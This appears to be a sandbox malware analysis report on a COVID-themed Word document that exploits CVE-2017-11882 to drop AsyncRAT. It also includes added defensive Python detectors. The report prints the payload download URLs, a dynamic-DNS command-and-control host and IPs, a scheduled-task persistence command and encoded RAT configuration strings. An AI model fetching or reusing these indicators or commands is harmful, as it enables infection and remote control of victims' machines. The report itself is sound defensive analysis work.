Analysis Report Deadly Variants of Covid 19.doc

Overview

General Information

Sample Name: Deadly Variants of Covid 19.doc
Analysis ID: 356233
MD5: 3d9171d094dae1fb8da244756dd9733c
SHA1: 91e43ec7a21e7e8c1fc2a6202ca3545974084ad2
SHA256: 4d1bde540b3c45739e1d8cff08e801ccb6ff9caad391109dc298b011a914e57c
Tags: COVID-19, doc, WHO

Detection

AsyncRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected AsyncRAT
Connects to a URL shortener service
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg ReversingLabs: Detection: 10%
Source: C:\Users\user\AppData\Roaming\rLliXAh.exe ReversingLabs: Detection: 10%
Source: C:\Users\Public\69577.exe ReversingLabs: Detection: 10%
Multi AV Scanner detection for submitted file
Source: Deadly Variants of Covid 19.doc ReversingLabs: Detection: 25%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\rLliXAh.exe Joe Sandbox ML: detected
Source: C:\Users\Public\69577.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.69577.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\69577.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\69577.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 4_2_00697580
Source: C:\Users\Public\69577.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 4_2_00691D74
Source: C:\Users\Public\69577.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 4_2_00697574
Source: C:\Users\Public\69577.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 4_2_00691D80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: bit.ly
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 67.199.248.10:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 67.199.248.10:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 79.134.225.49:5000 -> 192.168.2.22:49169
Connects to a URL shortener service
Source: unknown DNS query: name: bit.ly
Uses dynamic DNS services
Source: unknown DNS query: name: greatestyear2021.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 79.134.225.49:5000
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 79.134.225.49
Source: Joe Sandbox View IP Address: 93.89.224.134
Source: Joe Sandbox View IP Address: 67.199.248.10
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FINK-TELECOM-SERVICESCH
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected (each request observed twice):
GET /2Me6ei3 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: bit.ly
Connection: Keep-Alive

GET /2d/mgLD5CcdJx9YVKl.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Connection: Keep-Alive
Host: sgkmudder.org.tr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AD9C643-349E-46EF-BF24-C3A751787722}.tmp
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: bit.ly
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: 69577.exe, 00000007.00000003.2127625486.00000000047F2000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 69577.exe, 00000007.00000002.2351786512.000000000047C000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enP
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: 69577.exe, 00000004.00000002.2116750494.0000000005EE0000.00000002.00000001.sdmp, 69577.exe, 00000007.00000002.2353539025.0000000004CD0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2352229975.0000000002481000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 69577.exe, 00000007.00000002.2354290555.0000000005BB0000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: 2Me6ei3[1].htm.2.dr String found in binary or memory: http://sgkmudder.org.tr/2d/mgLD5CcdJx9YVKl.jpg
Source: 69577.exe, 00000004.00000002.2116750494.0000000005EE0000.00000002.00000001.sdmp, 69577.exe, 00000007.00000002.2353539025.0000000004CD0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT
Source: Yara match File source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
Source: Yara match File source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
Source: Yara match File source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\69577.exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\69577.exe Memory allocated: 76E20000 page execute and read and write (2 occurrences)
Source: C:\Users\Public\69577.exe Memory allocated: 76D20000 page execute and read and write (2 occurrences)
Detected potential crypto function
Source: C:\Users\Public\69577.exe Code functions (process 4): 4_2_00465948, 4_2_0046DD70, 4_2_004636CA, 4_2_00465720, 4_2_00463FA9, 4_2_0046488F, 4_2_0046408B, 4_2_0046492F, 4_2_0046412B, 4_2_004649CF, 4_2_004641CB, 4_2_00464A6A, 4_2_00464268, 4_2_00464B0A, 4_2_00464308, 4_2_00464BA4, 4_2_004643A8, 4_2_00464442, 4_2_00464C41, 4_2_004644E2, 4_2_004674E8, 4_2_0046457F, 4_2_00464619, 4_2_00460EEA, 4_2_004646B9, 4_2_00465710, 4_2_004647EF, 4_2_00463FF1, 4_2_00696418, 4_2_006955D0, 4_2_00695078
Source: C:\Users\Public\69577.exe Code functions (process 7): 7_2_00384DB8, 7_2_00385688, 7_2_003871F8, 7_2_00384A70
Source: 7.2.69577.exe.400000.0.unpack, Client/Settings.cs Base64 encoded string: 'GKyOs4mqqffrORbI+/SRDpDoWIHE7D9sSHoEMvC02sIHmvCDNWQu4eQ2CSkUkryaSTqv1Lc7sX9a+95BfwlqKlGP3NE0911acn24pjupCiE=', 'Nyi0F1igo6v0KFrZP/hXZp+cU2YJnVu/jH17vtFNQvjANrhd2gEnvSMfQLWpCkMG2YDOvKHxP+/Ed1RXXjNjXg==', 'PJvf6bLPQIzvp8wi/eJWbZHAwDKMh+cb/S+IhaLtlwSfyWDkQU2XZyXl+lgfFG4zKsH7M+94v9G7neDSBUAszHbQprcp0xVzEqueEcaNfWo=', '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', 'ze7mDq6AUfAO4/XDqQ9KTDg/4gOhNcqJuhRKQPbWcWLDUwjqOkgZYOg88ry1jyxgCtiIJ2Oab8L0207OXaDh4Q==', 'w9QHBiF4GNH2OE1WWIq/iALIlOVzLN+eqm/CymJld2qvp0cHlkpQL4Im9GSZcrsfLCcV3GOanTpc07FT5fkDjA==', 'zZ0k0sT0L/YwqUO6mapP8hk2zsVknfrnj4e56GEKR0bJWQifogqCb6TzWELfE3WRd7vTZ1NLZ/TYPymQl7E0hg==', 'I6q2Evg/k/+LyIZ7xcwC8YgfnMNMpCKwrpsAsAEsWsTJkSQGH4VaK19V1ua8Wc5qxzd88ykyr3AqWIZemNNifg=='
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@8/18@3/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$adly Variants of Covid 19.doc
Source: C:\Users\Public\69577.exe Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC7E0.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................P.......................(.P.....P.......H...............Lq......................................................................
Source: C:\Users\Public\69577.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll (2 occurrences)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\69577.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: C:\Users\Public\69577.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: Deadly Variants of Covid 19.doc ReversingLabs: Detection: 25%
Process chain (parent -> child, from the "Process created" records; WINWORD.EXE and EQNEDT32.EXE are COM-activated with -Embedding, so the report lists no parent for either):
WINWORD.EXE: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
EQNEDT32.EXE: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    -> C:\Users\Public\69577.exe (.NET loader; see the mscorlib native image loaded above)
        -> 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp' (image is C:\Windows\SysWOW64\schtasks.exe: the 32-bit loader's System32 path is redirected by WOW64)
        -> C:\Users\Public\69577.exe (second instance; the two 69577.exe processes are PIDs 2384 and 2468 in the Yara matches, and the unpacked AsyncRAT image at 0x400000 comes from the later one, process 7, consistent with the "Creates a process in suspended mode" and "Injects a PE file into a foreign processes" signatures)
Source: C:\Users\Public\69577.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\69577.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\69577.exe Code function: 4_2_004683E6 push es; iretd 4_2_004683E7

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\69577.exe
Source: C:\Users\Public\69577.exe File created: C:\Users\user\AppData\Roaming\rLliXAh.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\69577.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg
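The "non-matching file extension" hit is the payload fetch: EQNEDT32.EXE followed the bit.ly redirect to sgkmudder.org.tr, the response was cached under a .jpg name in Temporary Internet Files\Content.IE5 (a cache location that points to URLMon-style downloading; an inference, the report does not name the API), and the same process then wrote the PE to C:\Users\Public\69577.exe. The check below is an added example, not Joe Sandbox's or AsyncRAT's code: it sniffs a file's real format from its magic bytes and compares it with what the extension claims, and adds a cheap static test for the Equation.3 object (ProgID and CLSID) that a CVE-2017-11882 lure must embed. The report does not show the document's internals, so the Equation.3 markers are general knowledge of the format rather than observations from this sample, and every byte string below is constructed.

```python
"""Content-vs-extension and Equation Editor object checks for dropped or downloaded files.

Added example, not part of the report. Sample byte strings are constructed
(a minimal DOS/PE header, a JPEG SOI marker, an OLE2 signature, an RTF fragment).
"""
import os
import struct

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# CLSID {0002CE02-0000-0000-C000-000000000046} (Equation.3) as serialised on disk:
# Data1-Data3 little-endian, Data4 as written.
EQUATION3_CLSID_LE = bytes.fromhex("02CE0200" "0000" "0000" "C000000000000046")
EQUATION3_RTF_HEX = b"4571756174696f6e2e33"   # "Equation.3" hex-encoded, as inside \objdata


def sniff(data: bytes) -> str:
    """Classify by magic bytes; for MZ files follow e_lfanew to confirm a real PE."""
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        return "pe" if data[e_lfanew:e_lfanew + 4] == b"PE\0\0" else "mz-dos"
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data.startswith(b"{\\rtf"):
        return "rtf"
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    return "unknown"


# What each extension may legitimately contain. ".doc" admits RTF because Word opens
# RTF under a .doc name, which Equation Editor lures routinely rely on.
EXPECTED = {
    ".exe": {"pe"}, ".dll": {"pe"}, ".scr": {"pe"},
    ".jpg": {"jpeg"}, ".jpeg": {"jpeg"},
    ".doc": {"ole2", "rtf"}, ".rtf": {"rtf"}, ".docx": {"zip"},
}


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the extension claims one format and the bytes are another (PE as .jpg)."""
    ext = os.path.splitext(filename)[1].lower()
    return ext in EXPECTED and sniff(data) not in EXPECTED[ext]


def equation_editor_indicators(data: bytes) -> list:
    """Static hints that a document embeds an Equation Editor (EQNEDT32) object."""
    found = []
    if b"Equation.3" in data:
        found.append("Equation.3 progid")
    if EQUATION3_CLSID_LE in data:
        found.append("Equation.3 CLSID")
    if EQUATION3_RTF_HEX in data.lower():
        found.append("Equation.3 progid (RTF hex)")
    return found


# Constructed samples (not from the report).
def fake_pe() -> bytes:
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)      # 64-byte DOS header
    struct.pack_into("<I", hdr, 0x3C, 0x40)     # e_lfanew points just past it
    return bytes(hdr) + b"PE\0\0" + b"\0" * 20


FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"\0" * 16
FAKE_DOC = OLE2_MAGIC + b"\0" * 8 + b"Equation.3\0" + EQUATION3_CLSID_LE
# OLE1 prefix: version 0x501, FormatID 2 (embedded), class-name length 11, then "Equation.3\0" as hex.
FAKE_RTF = (b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}"
            b"{\\*\\objdata 01050000020000000b000000" + EQUATION3_RTF_HEX + b"}}}")

if __name__ == "__main__":
    for name, blob in [("mgLD5CcdJx9YVKl[1].jpg", fake_pe()),
                       ("Deadly Variants of Covid 19.doc", FAKE_DOC)]:
        print(f"{name}: sniff={sniff(blob)} mismatch={extension_mismatch(name, blob)} "
              f"indicators={equation_editor_indicators(blob)}")
```

Run against a real drop, sniff() is what turns "a .jpg in the IE cache" into "a PE in the IE cache" before any AV verdict exists; the Equation.3 check is a triage hint only, since a document can embed an equation legitimately and the exploit itself lives in the malformed equation record, which this does not parse.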

Boot Survival:

Yara detected AsyncRAT
Source: Yara match (the same nine memory and unpacked-PE matches listed under "Key, Mouse, Clipboard, Microphone and Screen Capturing" above)
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\69577.exe
Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'
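The chain recorded in the Exploits, System Summary and Boot Survival sections (EQNEDT32.EXE -> C:\Users\Public\69577.exe -> schtasks.exe importing a task definition from %TEMP%, plus a second 69577.exe instance) is what a host-based rule should key on; the task name 'Updates\rLliXAh' matches the copy dropped to AppData\Roaming\rLliXAh.exe. The triage below is an added example, not Joe Sandbox's or AsyncRAT's code. It replays constructed process-creation events built from the report's "Process created" records (PIDs other than 2384 and 2468 are assumed, and EQNEDT32.EXE's parent, which the report lists as unknown, is assumed to be the DCOM service host because the process is COM-activated with -Embedding) and shows why a rule keyed on "child of WINWORD.EXE" misses this chain while one keyed on "any child of EQNEDT32.EXE" does not.

```python
"""Process-creation triage for an Equation Editor dropper chain.

Added example (not Joe Sandbox or AsyncRAT code). EVENTS is constructed from the
"Process created" lines in this report; PIDs other than 2384/2468 and the svchost
parent of EQNEDT32.EXE/WINWORD.EXE are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path
    cmdline: str


# EQNEDT32.EXE is COM-activated ("-Embedding"), so its parent is the DCOM service
# host, not WINWORD.EXE. The sandbox started Word via COM automation too; both
# parents are "unknown" in the report and assumed to be svchost (PID 700) here.
EVENTS = [
    ProcEvent(700, 4, r"C:\Windows\System32\svchost.exe", "svchost.exe -k DcomLaunch"),
    ProcEvent(1000, 700, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r"'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding"),
    ProcEvent(1100, 700, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              r"'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding"),
    ProcEvent(2384, 1100, r"C:\Users\Public\69577.exe", r"C:\Users\Public\69577.exe"),
    ProcEvent(2400, 2384, r"C:\Windows\SysWOW64\schtasks.exe",
              r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' "
              r"/XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'"),
    ProcEvent(2468, 2384, r"C:\Users\Public\69577.exe", r"C:\Users\Public\69577.exe"),
    # Benign control event (constructed): must not be flagged.
    ProcEvent(3000, 600, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

SUSPICIOUS_DIRS = (r"c:\users\public", r"\appdata\local\temp", r"\appdata\roaming")
SCHTASKS_XML = re.compile(r"""/xml\s+['"]?([^'"]+)""", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _dirname(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()


def rule_eqnedt32_child(ev, by_pid):
    """Equation Editor has no business spawning anything; any child is a hit."""
    parent = by_pid.get(ev.ppid)
    return parent is not None and _basename(parent.image) == "eqnedt32.exe"


def rule_office_child(ev, by_pid):
    """The naive 'Office spawned a process' rule; misses EQNEDT32 because it is COM-launched."""
    parent = by_pid.get(ev.ppid)
    return parent is not None and _basename(parent.image) in {"winword.exe", "excel.exe", "powerpnt.exe"}


def rule_suspicious_location(ev, by_pid):
    """Executable sitting directly in C:\\Users\\Public, %TEMP% or the root of Roaming."""
    return ev.image.lower().endswith(".exe") and any(_dirname(ev.image).endswith(d) for d in SUSPICIOUS_DIRS)


def rule_schtasks_xml_from_temp(ev, by_pid):
    """schtasks /Create importing its task XML from a temp file (the report's Sigma hit)."""
    if _basename(ev.image) != "schtasks.exe" or "/create" not in ev.cmdline.lower():
        return False
    m = SCHTASKS_XML.search(ev.cmdline)
    return bool(m) and "\\appdata\\local\\temp\\" in m.group(1).lower()


RULES = {
    "eqnedt32_child": rule_eqnedt32_child,
    "office_child": rule_office_child,
    "suspicious_location": rule_suspicious_location,
    "schtasks_xml_from_temp": rule_schtasks_xml_from_temp,
}


def triage(events):
    """Return (pid, rule_name) pairs for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    return [(ev.pid, name) for ev in events for name, rule in RULES.items() if rule(ev, by_pid)]


def ancestry(pid, events):
    """Image basenames from the oldest known ancestor down to pid, for a ticket summary."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(_basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


if __name__ == "__main__":
    for pid, rule in triage(EVENTS):
        print(f"{rule:24} pid={pid}  chain={' > '.join(ancestry(pid, EVENTS))}")
```

The office_child rule never fires on this chain, which is the practical point: correlate on the Equation Editor process itself, not on its (absent) Office parent. Since the January 2018 Office security updates removed Equation Editor entirely, EQNEDT32.EXE starting at all is worth an alert on a patched estate, and the schtasks rule is the same condition the report's "Scheduled temp file as task from temp location" Sigma hit describes.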

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\Public\69577.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (26 occurrences)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (18 occurrences)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX (30 occurrences)
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
